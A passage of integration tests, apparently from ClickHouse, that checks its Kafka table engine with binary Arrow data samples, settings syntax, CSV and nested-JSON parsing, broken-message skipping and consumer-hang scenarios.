8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\
x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug('Set up {}'.format(format_name))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
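    """Compare the accumulated query result against a TSV reference file.

    With check=True the comparison is asserted, otherwise a bool is returned.
    """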
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
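    """Describe a consumer group by talking to the broker directly.

    Returns a list of dicts with member_id, client_id, client_host and the
    topic/partition assignment of every member of the given group.
    """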
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
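    """Module-scoped fixture: start the cluster once and shut it down after all tests in the module."""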
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
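    """Recreate the `test` database before every test so each test starts from a clean state."""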
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:{} --describe --members --group old --verbose".format(cluster.kafka_port)))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang", num_partitions=8, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
    # This should trigger a heartbeat failure,
    # which will trigger REBALANCE_IN_PROGRESS
    # and can lead to a consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
    # so it was waiting forever for the application to execute the queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang2", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
